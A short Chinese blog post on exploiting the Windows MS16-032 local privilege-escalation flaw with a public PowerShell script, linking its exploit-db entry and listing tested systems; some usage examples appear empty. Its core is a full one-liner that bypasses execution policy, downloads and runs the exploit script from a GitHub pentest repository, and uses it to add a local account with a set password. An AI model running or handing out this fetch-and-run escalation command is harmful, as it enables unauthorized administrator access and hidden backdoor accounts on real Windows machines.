MoR03r MoR03r's Blog
MS16-032 Windows本地提权
发表于 2017-2-5 | exploit

有个公开的powershell脚本可以进行提权。
exploit-db的详情:

https://www.exploit-db.com/exploits/39574/

试用系统:
Tested on x32 Win7, x64 Win8, x64 2k12R2

Invoke-MS16-032.ps1

示例:

使用方式如下:

添加用户:

运行某程序:

远程加用户:
直接执行如下命令,可进行提权并添加用户:

powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘[https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1](https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1)’);Invoke-MS16-032 -Application cmd.exe -commandline ‘/c net user evi1cg test123 /add'”

演示如下:

评论:

Se7en
2018-10-20 00:37
嘻嘻,很强很强
TOP